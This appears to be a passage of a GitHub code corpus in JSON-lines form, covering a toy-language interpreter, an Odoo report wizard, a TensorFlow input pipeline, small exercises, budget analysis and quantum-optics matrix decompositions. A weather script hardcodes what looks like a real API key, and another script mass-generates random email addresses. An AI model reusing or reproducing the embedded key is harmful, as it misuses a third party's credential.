'following', 'commit_last_year'])\n writer.writeheader()\n\n # write new entry\n with open('users.csv', 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n for user in self.users:\n entry = list(self.users[user].values())\n entry.insert(0, user)\n writer.writerow(entry)\n\n # remove duplicated entries and keep the last\n df = pd.read_csv(filename, header=0, index_col=False)\n df.drop_duplicates(subset='user', keep='last', inplace=True)\n df.to_csv(filename, index=False)\n\n def scrape(self):\n users = set(self.__users)\n for user in users:\n print(\"scraping user\", user)\n self.users[user] = {}\n\n # PRs\n self.users[user]['total_pr'] = self.__users.count(user)\n\n # does user has twitter account\n self.users[user]['user_has_twitter'] = self.__user_has_twitter(user)\n\n # load contents\n url = 'https://api.github.com/users/' + user\n try:\n repodata = requests.get(url).text\n data = json.loads(repodata)\n except Exception as e:\n print(\"Error Occurred!\")\n exit()\n\n # set values\n self.users[user]['public_repos'] = data['public_repos']\n self.users[user]['followers'] = data['followers']\n self.users[user]['following'] = data['following']\n\n # fetch contributions number in the last year\n url = 'https://github.com/users/' + user + '/contributions'\n try:\n html_content = requests.get(url).text\n soup = BeautifulSoup(html_content, features=\"html.parser\")\n text = soup.findAll('h2', {'class': 'f4 text-normal mb-2'})[0].text\n total = int(''.join(filter(str.isdigit, text)))\n self.users[user]['commit_last_year'] = total\n except Exception as e:\n print(\"Error Occurred!\")\n exit()\n\n try:\n self.to_CSV()\n except Exception as e:\n print(\"Failed to write to CSV file!\")\n exit()\n","repo_name":"LimingZheng-NAU/INF502","sub_path":"PA2/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3478308641","text":"# -----------------------------------------------------------------------------\n# calc.py\n#\n# Expressions arithmétiques sans variables\n# -----------------------------------------------------------------------------\nfrom genereTreeGraphviz2 import printTreeGraph\n\n# PREPARER DES INPUTS POUR LA SOUTENANCE\n\ntokens = [\n 'NUMBER', 'MINUS',\n 'PLUS', 'TIMES', 'DIVIDE',\n 'LPAREN', 'RPAREN', 'AND', 'OR',\n 'SEMICOLON',\n 'NAME', 'EQUAL',\n 'COMPARE',\n 'LACCOL', 'RACCOL',\n 'SEPARATOR', 'QUOTE'\n]\n\n# Tokens\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_LACCOL = r'\\{'\nt_RACCOL = r'\\}'\nt_AND = r'&'\nt_OR = r'\\|'\nt_SEMICOLON = r';'\nt_EQUAL = r'='\nt_COMPARE = r'[<>]'\nt_SEPARATOR = r','\nt_QUOTE = r'\\\"'\n\nreserved = {\n 'print': 'PRINT',\n 'true': 'TRUE',\n 'false': 'FALSE',\n 'if': 'IF',\n 'else': 'ELSE',\n 'while': 'WHILE',\n 'for': 'FOR',\n 'function': 'FUNCTION'\n}\n\nprecedence = (\n ('left', 'PLUS', 'MINUS'),\n ('nonassoc', 'AND', 'OR', 'EQUAL', 'COMPARE'),\n ('left', 'TIMES', 'DIVIDE')\n)\n\ntokens += reserved.values()\n\nnames = {}\nfunctions = {}\nparams = {}\n\n\ndef t_NUMBER(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n\n# Ignored characters\nt_ignore = \" \\t\"\n\n\ndef t_NAME(t):\n r'[a-zA-Z_][a-zA-Z0-9_]*'\n if t.value in reserved:\n t.type = reserved[t.value]\n return t\n\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n\n\ndef t_error(t):\n print(\"Illegal character '%s'\" % t.value[0])\n t.lexer.skip(1)\n\n\n# Build the lexer\nimport ply.lex as lex\n\nlex.lex()\n\n\ndef p_start(p):\n \"\"\"start : bloc\"\"\"\n p[0] = ('START', p[1])\n #printTreeGraph(p[1])\n print(p[0])\n evalInst(p[1])\n\n\ndef p_bloc(p):\n \"\"\"bloc : bloc statement SEMICOLON\n | statement SEMICOLON\"\"\"\n if p[2] == \";\":\n p[0] = ('bloc', p[1], 'empty')\n else:\n p[0] = ('bloc', p[1], p[2])\n\n\ndef p_print(p):\n \"\"\"statement : PRINT LPAREN params RPAREN\"\"\"\n p[0] = ('print', p[3])\n\n\ndef p_expression_binop_plus(p):\n \"\"\"expression : expression PLUS expression\"\"\"\n\n p[0] = ('+', p[1], p[3])\n\n\ndef p_expressionTrue(p):\n \"\"\"expression : TRUE\"\"\"\n p[0] = ('true')\n\n\ndef p_expressionFalse(p):\n \"\"\"expression : FALSE\"\"\"\n p[0] = ('false')\n\n\ndef p_name_assign(p):\n \"\"\"statement : NAME EQUAL expression\n | NAME PLUS PLUS\"\"\"\n if p[2] == \"=\":\n p[0] = ('assign', p[1], p[3])\n else:\n p[0] = ('assign', p[1], p[2], p[3])\n\n\ndef p_expression_binop_bool2(p):\n \"\"\"expression : expression COMPARE expression\"\"\"\n\n p[0] = (p[2], p[1], p[3])\n\n\ndef p_expression_binop_bool(p):\n \"\"\"expression : expression AND expression\n | expression OR expression\"\"\"\n if p[2] == '&':\n p[0] = ('and', p[1], p[3])\n else:\n p[0] = ('or', p[1], p[3])\n\n\ndef p_expression_binop_times(p):\n \"\"\"expression : expression TIMES expression\"\"\"\n p[0] = ('*', p[1], p[3])\n\n\ndef p_expression_binop_divide_and_minus(p):\n \"\"\"expression : expression MINUS expression\n\t\t\t\t | expression DIVIDE expression\"\"\"\n p[0] = (p[2], p[1], p[3])\n\n\ndef p_expression_group(p):\n \"\"\"expression : LPAREN expression RPAREN\"\"\"\n p[0] = p[2]\n\n\ndef p_condition(p):\n \"\"\"statement : IF expression LACCOL bloc RACCOL\n | IF expression LACCOL bloc RACCOL ELSE LACCOL bloc RACCOL\"\"\"\n if len(p) > 6:\n p[0] = ('if', p[2], p[4], p[8])\n else:\n p[0] = ('if', p[2], p[4])\n\n\ndef p_loop(p):\n \"\"\"statement : WHILE expression LACCOL bloc RACCOL\"\"\"\n p[0] = ('while', p[2], p[4])\n\n\ndef p_for(p):\n \"\"\"statement : FOR LPAREN statement SEMICOLON expression SEMICOLON statement RPAREN LACCOL bloc RACCOL\"\"\"\n p[0] = ('for', p[3], p[5], p[7], p[10])\n\n\ndef p_params(p):\n \"\"\"params : expression SEPARATOR params\n | expression\"\"\"\n\n if len(p) == 2:\n p[0] = ('param', p[1], 'empty')\n else:\n p[0] = ('param', p[1], p[3])\n\n\ndef p_function(p):\n \"\"\"statement : FUNCTION NAME LPAREN RPAREN LACCOL bloc RACCOL\n | FUNCTION NAME LPAREN params RPAREN LACCOL bloc RACCOL\"\"\"\n if len(p) == 8:\n p[0] = ('function', p[2], p[6])\n else:\n p[0] = ('function', p[2], p[4], p[7])\n\n\ndef p_expression_number(p):\n \"\"\"expression : NUMBER\"\"\"\n p[0] = p[1]\n\n\ndef p_name(p):\n \"\"\"expression : NAME\"\"\"\n p[0] = p[1]\n\n\ndef p_word(p):\n \"\"\"expression : QUOTE expression\n | NAME QUOTE\n | NAME expression\"\"\"\n\n if p[1] == '\"':\n p[0] = p[2]\n elif p[2] == '\"':\n p[0] = ('string', p[1], 'empty')\n else:\n p[0] = ('string', p[1], p[2])\n\n\ndef p_function_call(p):\n \"\"\"statement : NAME LPAREN RPAREN\n | NAME LPAREN params RPAREN\"\"\"\n if len(p) == 4:\n p[0] = ('call', p[1])\n else:\n p[0] = ('call', p[1], p[3])\n\n\ndef p_error(p):\n print(\"Syntax error at '%s'\" % p.value)\n\n\ndef evalExpr(t):\n if type(t) == int:\n return t\n elif type(t) == str:\n if t == \"true\":\n return True\n elif t == \"false\":\n return False\n else:\n return names[t]\n else:\n if t[0] == \"+\":\n return evalExpr(t[1]) + evalExpr(t[2])\n elif t[0] == \"-\":\n return evalExpr(t[1]) - evalExpr(t[2])\n elif t[0] == \"*\":\n return evalExpr(t[1]) * evalExpr(t[2])\n elif t[0] == \"/\":\n return evalExpr(t[1]) / evalExpr(t[2])\n elif t[0] == \"and\":\n return evalExpr(t[1]) and evalExpr(t[2])\n elif t[0] == \"or\":\n return evalExpr(t[1]) or evalExpr(t[2])\n elif t[0] == \">\":\n return evalExpr(t[1]) > evalExpr(t[2])\n elif t[0] == \"<\":\n return evalExpr(t[1]) < evalExpr(t[2])\n elif t[0] == \"string\":\n res = ''\n unstack_val = t\n while True:\n res += unstack_val[1]\n if unstack_val[2] == \"empty\":\n break\n else:\n res += ' '\n unstack_val = unstack_val[2]\n return res\n\n\ndef evalInst(t):\n if t[0] == \"bloc\":\n evalInst(t[1])\n evalInst(t[2])\n elif t[0] == \"print\":\n unstack_val = t[1]\n while True:\n print('calc >', str(evalExpr(unstack_val[1])))\n if unstack_val[2] == \"empty\":\n break\n else:\n unstack_val = unstack_val[2]\n elif t[0] == \"assign\":\n if len(t) == 4:\n names[t[1]] += 1\n else:\n names[t[1]] = evalExpr(t[2])\n elif t[0] == \"function\":\n if len(t) == 4:\n params[t[1]] = t[2]\n functions[t[1]] = t[3]\n else:\n functions[t[1]] = t[2]\n elif t[0] == \"call\":\n if t[1] in functions:\n if len(t) > 2:\n unstack_val = t[2]\n unstack_var = params[t[1]]\n while True:\n names[unstack_var[1]] = evalExpr(unstack_val[1])\n if unstack_val[2] == \"empty\":\n break\n else:\n unstack_val = unstack_val[2]\n unstack_var = unstack_var[2]\n evalInst(functions[t[1]])\n elif t[0] == \"if\":\n if evalExpr(t[1]):\n evalInst(t[2])\n elif len(t) > 3:\n evalInst(t[3])\n elif t[0] == \"while\":\n while evalExpr(t[1]):\n evalInst(t[2])\n elif t[0] == \"for\":\n evalInst(t[1])\n while evalExpr(t[2]):\n evalInst(t[4])\n evalInst(t[3])\n\n\nimport ply.yacc as yacc\n\nyacc.yacc()\n\nwith open(\"test/file5.txt\") as file:\n s = file.read()\n\nyacc.parse(s)\n","repo_name":"Pbonnamy/language_parser_python","sub_path":"calcBase.py","file_name":"calcBase.py","file_ext":"py","file_size_in_byte":7810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22400866161","text":"# -*- coding: utf-8 -*-\n#################################################################################\n\nfrom odoo import models, fields, api, _\nfrom datetime import datetime, date\n\n\nclass warehouse_inventory_wizard(models.TransientModel):\n _name = \"warehouse.inventory.wizard\"\n\n company_id = fields.Many2one('res.company', string=\"Company\", default=lambda self: self.env.user.company_id.id, required=True)\n warehouse_ids = fields.Many2many('stock.warehouse', 'warehouse_wizard_stock_rel', string=\"Warehouse\")\n\n @api.onchange('company_id')\n def onchange_company_id(self):\n if self.company_id:\n self.warehouse_ids = False\n\n @api.multi\n def generate_pdf_report(self):\n if not self.warehouse_ids:\n warehouse_ids = self.warehouse_ids\n else:\n warehouse_ids = self.env['stock.warehouse'].search([('company_id', '=', self.company_id.id)])\n datas = {'form':\n {\n 'company_id': self.company_id.id,\n 'warehouse_ids': [y.id for y in warehouse_ids],\n 'id': self.id,\n },\n }\n return self.env.ref('sun_stock_by_warehouse.action_report_stock_inventory').report_action(self, data=datas)\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","repo_name":"detian08/bsp_addons","sub_path":"stock/sun_stock_by_warehouse/wizard/warehouse_product_wizard.py","file_name":"warehouse_product_wizard.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"38864440882","text":"import tensorflow as tf\n\n\nclass MovieReviewDataset:\n\n def __init__(self, data_file, batch_size, perform_shuffle, bucket_width, num_buckets):\n self.data_file = data_file\n self.batch_size = batch_size\n self.perform_shuffle = perform_shuffle\n self.bucket_width = bucket_width\n self.num_buckets = num_buckets\n\n def parser(self, tfrecord):\n feature_names = ['words', 'size']\n context_features = {\n 'size': tf.FixedLenFeature([], dtype=tf.int64),\n 'label': tf.FixedLenFeature([], dtype=tf.int64)\n }\n sequence_features = {\n 'tokens': tf.FixedLenSequenceFeature([], dtype=tf.int64)\n }\n\n tfrecord_parsed = tf.parse_single_sequence_example(\n tfrecord, context_features, sequence_features)\n\n tokens = tfrecord_parsed[1]['tokens']\n label = tfrecord_parsed[0]['label']\n size = tfrecord_parsed[0]['size']\n\n return dict(zip(feature_names, [tokens, size])), label\n\n def create_bucket_dataset(self, movie_dataset):\n def batching_func(dataset):\n return dataset.padded_batch(\n self.batch_size,\n padded_shapes=(\n {\n 'words': tf.TensorShape([None]),\n 'size': tf.TensorShape([])\n },\n tf.TensorShape([])) # size\n )\n\n def key_func(features, label):\n size = features['size']\n bucket_id = size // self.bucket_width\n\n return tf.to_int64(tf.minimum(bucket_id, self.num_buckets))\n\n def reduce_func(bucket_key, widowed_data):\n return batching_func(widowed_data)\n\n movie_dataset = movie_dataset.apply(\n tf.contrib.data.group_by_window(\n key_func=key_func, reduce_func=reduce_func, window_size=self.batch_size))\n\n return movie_dataset\n\n def create_dataset(self):\n movie_dataset = tf.data.TFRecordDataset(self.data_file).map(self.parser)\n\n if self.perform_shuffle:\n movie_dataset = movie_dataset.shuffle(buffer_size=self.batch_size * 2)\n\n self.movie_dataset = self.create_bucket_dataset(movie_dataset)\n\n return self.movie_dataset\n","repo_name":"lucasmoura/movie_critic_stars","sub_path":"model/input_pipeline.py","file_name":"input_pipeline.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"9022888290","text":"\"\"\"\nЗадание_4. Определить, какое число в массиве встречается чаще всего\n\n\"\"\"\nimport random\n\nSIZE = 10\nMIN_ITEM = 0\nMAX_ITEM = 5\narray = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(SIZE)]\n# array = [11, 0, 11, 8,8,8,8,8, 13]\nprint(array)\nmax_count = 0\nmax_ind = 0\nfor i in range(len(array)):\n ccc = 0\n j = i + 1\n for j in range(len(array)):\n if array[i] == array[j]:\n ccc += 1\n if max_count < ccc:\n max_count = ccc\n max_ind = i\n\nprint(f'число {array[max_ind]} в массиве встречается чаще, всего {max_count} раз(а))')\n","repo_name":"Bulgakoff/PyAlg","sub_path":"Lesson03/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15677221918","text":"from Enums.colors import Color\nfrom Enums.unicode import Unicode\nfrom Pieces.bishop import Bishop\nfrom Pieces.king import King\nfrom Pieces.knight import Knight\nfrom Pieces.pawn import Pawn\nfrom Pieces.queen import Queen\nfrom Pieces.rook import Rook\n\n# noinspection PyTypeChecker\nclass Board:\n def __init__(self):\n self.width = 8\n self.height = 8\n self.board = self.newGame()\n\n def newGame(self):\n board = [[None]*self.width for _ in range(self.height)]\n\n # White\n board[0][0] = Rook(Color.WHITE, 0, 0)\n board[0][1] = Knight(Color.WHITE, 0, 1)\n board[0][2] = Bishop(Color.WHITE, 0, 2)\n board[0][3] = Queen(Color.WHITE, 0, 3)\n board[0][4] = King(Color.WHITE, 0, 4)\n board[0][5] = Bishop(Color.WHITE, 0, 5)\n board[0][6] = Knight(Color.WHITE, 0, 6)\n board[0][7] = Rook(Color.WHITE, 0, 7)\n for col in range(self.width):\n board[1][col] = Pawn(Color.WHITE, 1, col)\n\n # Black\n for col in range(self.width):\n board[self.height - 2][col] = Pawn(Color.BLACK, self.height - 2, col)\n board[7][0] = Rook(Color.BLACK, 7, 0)\n board[7][1] = Knight(Color.BLACK, 7, 1)\n board[7][2] = Bishop(Color.BLACK, 7, 2)\n board[7][3] = Queen(Color.BLACK, 7, 3)\n board[7][4] = King(Color.BLACK, 7, 4)\n board[7][5] = Bishop(Color.BLACK, 7, 5)\n board[7][6] = Knight(Color.BLACK, 7, 6)\n board[7][7] = Rook(Color.BLACK, 7, 7)\n\n return board\n\n def print(self):\n for row in self.board:\n pRow = []\n for place in row:\n if place is not None:\n pRow.append(Unicode.chrs[(place.color, place.__class__)])\n print(pRow)\n\nb = Board()\nb.newGame()\nb.print()\n","repo_name":"mextenderr/pyChess","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12715924660","text":"# Python version: 3.9.7\n# Date: 6/23/2022\n# Author: Mohammed Hassan\n# Description: Email Generator\n# Telegram channel: https://t.me/python_2\n\n#Libraries\nimport string\nimport random\n\n#Msg start\nprint(\"Telegram Channel:\"'\\n'\"https://t.me/python_2\")\nprint(\"1 - yahoo\"'\\n'\"2 - gmail\"'\\n'\"3- Hotmail\"'\\n'\"Choose any domail\")\n\n#Variables\nletters = string.ascii_lowercase\nemail = int(input(\"domain : \"))\nGenerator = int(input(\"How many emails: \"))\nSTOP = 0\nLetters = 0\nFile_Email = open(\"email.txt\", \"w\")\nranges = int(input(\"email characters range : \"))\n\n#Loop\nwhile True:\n\n\n if email == 1:\n File_Email.write(''.join(random.choice(letters) for i in range(ranges))+'@yahoo.com'+'\\n')\n STOP += 1\n if STOP == Generator:\n break\n\n if email == 2:\n File_Email.write(''.join(random.choice(letters) for i in range(ranges)) + '@gmail.com' + '\\n')\n STOP += 1\n if STOP == Generator:\n break\n\n if email == 3:\n File_Email.write(''.join(random.choice(letters) for i in range(ranges)) + '@Hotmail.com' + '\\n')\n STOP += 1\n if STOP == Generator:\n break\n\n#Msg end\nprint(\"Done Generator!\")\n\n","repo_name":"mgkw/Email-Generator","sub_path":"Email _Generator.py","file_name":"Email _Generator.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35914430974","text":"class Solution:\n \"\"\"\n @param n: An integer\n @return: return a integer as description.\n \"\"\"\n\n def nthUglyNumber(self, n: int) -> int:\n heap = [1]\n visited = {1}\n cur_val = 0\n import heapq\n for i in range(n):\n cur_val = heapq.heappop(heap)\n for factor in [2, 3, 5]:\n next_val = cur_val * factor\n if next_val in visited:\n continue\n heapq.heappush(heap, next_val)\n visited.add(next_val)\n return cur_val\n","repo_name":"Super262/LintCodeSolutions","sub_path":"data_structures/heap/problem0004.py","file_name":"problem0004.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"27000107111","text":"import requests\r\nfrom collections.abc import Iterable, Iterator\r\n\r\nclass WeatherIterator(Iterator):\r\n def __init__(self, cities):\r\n self.cities = cities\r\n self.index = 0\r\n\r\n def __next__(self):\r\n if self.index == len(self.cities):\r\n raise StopIteration\r\n city = self.cities[self.index]\r\n self.index += 1\r\n return self.getWeather(city)\r\n\r\n def getWeather(self, city):\r\n # 使用心知天气API获取城市天气数据\r\n api_key = \"Sq1lM8msLFRwgRGKj\"\r\n url = f\"https://api.seniverse.com/v3/weather/now.json?key={api_key}&location={city}&language=zh-Hans&unit=c\"\r\n response = requests.get(url)\r\n data = response.json()\r\n weather = data[\"results\"][0][\"now\"][\"text\"]\r\n temperature = data[\"results\"][0][\"now\"][\"temperature\"]\r\n return f\"{city}: {weather},温度:{temperature}°C\"\r\n\r\nclass WeatherIterable(Iterable):\r\n def __init__(self, cities):\r\n self.cities = cities\r\n\r\n def __iter__(self):\r\n return WeatherIterator(self.cities)\r\n\r\n# 调用示例\r\ncities = ['北京', '上海', '广州', '深圳']\r\nweather_data = WeatherIterable(cities)\r\n\r\nfor data in weather_data:\r\n print(data)","repo_name":"wanghan79/2023_Python","sub_path":"2021011891吴敏妃/final_work/work3.py","file_name":"work3.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"11908647662","text":"import csv\n\n# Files to load and output (Remember to change these)\nfile_to_load = \"budget_data_1.csv\"\nfile_to_output = \"budget_analysis_1.txt\"\n\n# Read the csv and convert it into a reader\n\nwith open(file_to_load,\"r\") as f:\n reader = csv.reader(f,delimiter = \",\")\n data = list(reader)[1:] \n \n # Create two empty lists to populate\n revenue = []\n\n revenue_change = []\n # difference = int(data(row[1]))\n\n for row in data:\n # Populate revenue list and slice out the header\n revenue.append((row[1]))\n # convert list of strings into list of integers\n revenue = list(map(int, revenue)) \n\nchange = 0\nchange = int(change)\nprevious_row = revenue[0]\n\nfor row in revenue:\n change = row - previous_row\n revenue_change.append((change))\n previous_row = row\n\nrevenue_change = revenue_change[1:]\nrevenue_change = list(map(int, revenue_change)) \n\n# Row count without the headers will give you the total number of months. \nrow_count = len(revenue) \n# Now that the revenue list is converted to integers, I can sum the row to dete1rmine the total revenue for the spread sheet\ntotal_revenue = sum(revenue) \n# Determine the average change between months\ntotal_change = sum(revenue_change)\ntotal_change = int(total_change)\nnumber_of_changes = len(revenue[1:])\nnumber_of_changes = int(number_of_changes)\naverage_change = total_change / number_of_changes\n\n# Make of new list of the changes by months\n\nmonth2 = []\n\nfor row in data:\n # Populate revenue list and slice out the header\n month2.append((row[0]))\n # convert list of strings into list of integers\n \n \n \nmonth2 = month2[1:]\nmonth_changes = [\n (\"Month\", [month2]),\n (\"Changes in Revenue\", [revenue_change])]\n\n# Determine the Maximun and Minumum monthly revenue in the list\n\nMax = max(revenue)\nMin = min(revenue)\nMax2 = max(revenue_change)\nMin2 = min(revenue_change) \n\n\n\nfor row in data:\n if row[1] == str(Max):\n max_row = row\n\nfor row in data:\n if row[1] == str(Min):\n min_row = row\n\nkeys = month2\nvalues = revenue_change\ndictionary = dict(zip(keys, values))\n\n\n\n# Print Output\nprint(\" Financial Analysis ----------------------------\")\nprint(\" Total Months - \", row_count)\nprint(\" Total Reveue- \", total_revenue)\nprint(\" Average Revenue Change- \", average_change)\nprint(\" Month with the Greatest Revenue- \", max_row)\nprint(\" Month with the Lowest Revenue- \", min_row)\nprint(\" Greatest Increase in Revenue- \", max(dictionary), Max2)\nprint(\" Greatest Decrease in Revenue- \", min(dictionary), Min2)\n\n\n\n\n","repo_name":"mikebarajas/PyBank-Analysis","sub_path":"pybank.py","file_name":"pybank.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1741892192","text":"from typing import Tuple\n\nimport numpy as np\n\nfrom scipy.linalg import sqrtm, schur, block_diag\nfrom scipy.optimize import root_scalar\n\nfrom piquasso._math.symplectic import xp_symplectic_form\nfrom piquasso._math.transformations import from_xxpp_to_xpxp_transformation_matrix\n\nfrom piquasso.api.exceptions import InvalidParameter\n\n\ndef takagi(matrix, calculator, rounding=12):\n \"\"\"Takagi factorization of complex symmetric matrices.\n\n Note:\n\n The singular values have to be rounded due to floating point errors.\n\n The result is not unique in a sense that different result could be obtained\n by different ordering of the singular values.\n\n References:\n - https://journals.aps.org/pra/abstract/10.1103/PhysRevA.94.062109\n \"\"\"\n\n np = calculator.np\n\n V, singular_values, W_adjoint = calculator.svd(matrix)\n\n W = np.conj(W_adjoint).T\n\n singular_value_multiplicity_map = {}\n\n for index, value in enumerate(singular_values):\n value = calculator.fallback_np.round(value, decimals=rounding)\n\n if value not in singular_value_multiplicity_map:\n singular_value_multiplicity_map[value] = [index]\n else:\n singular_value_multiplicity_map[value].append(index)\n\n diagonal_blocks_for_Q = []\n\n for indices in singular_value_multiplicity_map.values():\n Z = V[:, indices].transpose() @ W[:, indices]\n\n diagonal_blocks_for_Q.append(calculator.sqrtm(Z))\n\n Q = calculator.block_diag(*diagonal_blocks_for_Q)\n\n return singular_values, V @ np.conj(Q)\n\n\ndef _rotation_to_positive_above_diagonals(block_diagonal_matrix):\n \"\"\"\n The block diagonal matrix returned by the Schur decomposition in the Williamson\n decomposition needs to be rotated.\n\n Not doing this we'd still get a valid Williamson decompostion with valid symplectic\n and diagonal matrices, but the symplectic matrix would have complex elements and the\n diagonal matrix would have negative values.\n \"\"\"\n\n d = len(block_diagonal_matrix) // 2\n identity = np.identity(2)\n rotation = np.rot90(identity)\n\n return block_diag(\n *[\n identity\n if block_diagonal_matrix[2 * index, 2 * index + 1] > 0\n else rotation\n for index in range(d)\n ]\n )\n\n\ndef williamson(matrix: np.ndarray) -> tuple:\n r\"\"\"\n Decomposes a positive definite matrix with Williamson decomposition, i.e. a\n positive definite :math:`M` is decomposed to\n\n .. math::\n\n M = S D S^T,\n\n where :math:`S \\in \\operatorname{Sp}(\\mathbb{R}, 2d)` is a real symplectic matrix,\n and :math:`D` is a diagonal matrix containing positive values in the diagonal.\n\n The algorithm works as follows: without loss of generality, one can write the\n symplectic matrix in the form of\n\n .. math::\n\n S = M^{1 / 2} K D^{- 1 / 2}\n\n with :math:`K \\in O(2d)`, since then\n\n .. math::\n\n M = S D S^T\n\n by construction. Now we need to find such :math:`K` that the value of :math:`S` is\n symplectic.\n\n .. math::\n\n S^T \\Omega S = \\Omega\n \\rightleftarrow\n M^{- 1 / 2} J M^{- 1 / 2} = K D^{- 1 / 2} J D^{- 1 / 2} K^T,\n\n where\n\n .. math::\n\n D^{- 1 / 2} J D^{- 1 / 2}\n =\n \\begin{bmatrix}\n 0 & \\hat{D}^{-1} \\\\\n \\hat{D}^{-1} & 0 \\\\\n \\end{bmatrix}\n\n is an antisymmetric matrix. We also know that :math:`M^{- 1 / 2} J M^{- 1 / 2}` is\n also antisymmetric. We just need to deduce the orthogonal transformation :math:`K`\n to acquire the symplectic matrix :math:`S`.\n\n We can use a (real) Schur decomposition to block-diagonalize\n :math:`M^{- 1 / 2} J M^{- 1 / 2}`. Note, that we also rotate the block to have the\n positive values in the above the diagonal to acquire real-valued symplectic matrices\n in the Williamson decomposition. Finally, we can acquire\n :math:`D^{- 1 / 2} J D^{- 1 / 2}` with a simple basis change.\n\n References:\n - https://math.stackexchange.com/a/1244793\n\n Args:\n matrix (numpy.ndarray): The matrix to decompose.\n\n Returns\n tuple: Tuple of the symplectic and diagonal matrices, in this order.\n \"\"\"\n\n d = len(matrix) // 2\n\n omega = xp_symplectic_form(d)\n\n root_matrix = sqrtm(matrix).real\n inverse_root_matrix = np.linalg.inv(root_matrix)\n\n block_diagonal_part, orthogonal_part = schur(\n inverse_root_matrix @ omega @ inverse_root_matrix,\n output=\"real\",\n )\n\n basis_change = _rotation_to_positive_above_diagonals(\n block_diagonal_part\n ) @ from_xxpp_to_xpxp_transformation_matrix(d)\n ordered_block_diagonal = basis_change.T @ block_diagonal_part @ basis_change\n\n inverse_diagonal_matrix = block_diag(*(ordered_block_diagonal[:d, d:],) * 2)\n\n root_inverse_diagonal_matrix = np.diag(np.sqrt(np.diag(inverse_diagonal_matrix)))\n\n symplectic = (\n root_matrix @ orthogonal_part @ basis_change @ root_inverse_diagonal_matrix\n )\n\n diagonal_matrix = np.diag(1 / np.diag(inverse_diagonal_matrix))\n\n return symplectic, diagonal_matrix\n\n\ndef decompose_to_pure_and_mixed(\n matrix: np.ndarray,\n hbar: float,\n) -> Tuple[np.ndarray, np.ndarray]:\n symplectic, diagonal = williamson(matrix)\n pure_covariance = hbar * symplectic @ symplectic.transpose()\n mixed_contribution = (\n symplectic\n @ (diagonal - hbar * np.identity(len(diagonal)))\n @ symplectic.transpose()\n )\n return pure_covariance, mixed_contribution\n\n\ndef decompose_adjacency_matrix_into_circuit(\n adjacency_matrix, mean_photon_number, calculator\n):\n singular_values, unitary = takagi(adjacency_matrix, calculator)\n\n scaling = _get_scaling(singular_values, mean_photon_number, adjacency_matrix)\n\n squeezing_parameters = np.arctanh(scaling * singular_values)\n\n return squeezing_parameters, unitary\n\n\ndef _get_scaling(\n singular_values: np.ndarray, mean_photon_number: float, adjacency_matrix: np.ndarray\n) -> float:\n r\"\"\"\n For a squeezed state :math:`rho` the mean photon number is calculated by\n\n .. math::\n \\langle n \\rangle_\\rho = \\sum_{i = 0}^d \\mathrm{sinh}(r_i)^2\n\n where :math:`r_i = \\mathrm{arctan}(s_i)`, where :math:`s_i` are the singular\n values of the adjacency matrix.\n \"\"\"\n\n def mean_photon_number_equation(scaling: float) -> float:\n return (\n sum(\n (scaling * singular_value) ** 2 / (1 - (scaling * singular_value) ** 2)\n for singular_value in singular_values\n )\n / len(singular_values)\n - mean_photon_number\n )\n\n def mean_photon_number_gradient(scaling: float) -> float:\n return (2.0 / scaling) * np.sum(\n (singular_values * scaling / (1 - (singular_values * scaling) ** 2)) ** 2\n )\n\n lower_bound = 0.0\n\n tolerance = 1e-10 # Needed to avoid zero division.\n\n upper_bound = 1.0 / (max(singular_values) + tolerance)\n\n result = root_scalar(\n mean_photon_number_equation,\n fprime=mean_photon_number_gradient,\n x0=(lower_bound - upper_bound) / 2.0,\n bracket=(lower_bound, upper_bound),\n )\n\n if not result.converged:\n raise InvalidParameter(\n f\"No scaling found for adjacency matrix: {adjacency_matrix}.\"\n )\n\n return result.root\n","repo_name":"Budapest-Quantum-Computing-Group/piquasso","sub_path":"piquasso/_math/decompositions.py","file_name":"decompositions.py","file_ext":"py","file_size_in_byte":7358,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"6"} +{"seq_id":"41945835884","text":"# we need to adding each digits of a number\n# 576 => 5+7+6 = 18 => 1+ 8 = 9\n\n# x = int(input('enter a number : ')) # 576\n# sum_digit = 0\n# sum_of_digits = 0\n# for digit in str(x):\n# sum_digit += int(digit)\n# print(sum_digit, end=' ')\n# for digit in str(sum_digit):\n# sum_of_digits += int(digit)\n# # print(sum_of_digits, end=' ')\n# print(f'sum of each digits is {sum_of_digits}')\n# enter a number : 576\n# 5 12 18 sum of each digits is 9\n\n# or compact way\nnumber = 576\n\nsum_of_digits = sum(int(digit) for digit in str(number))\nsum_digit = sum(int(digit) for digit in 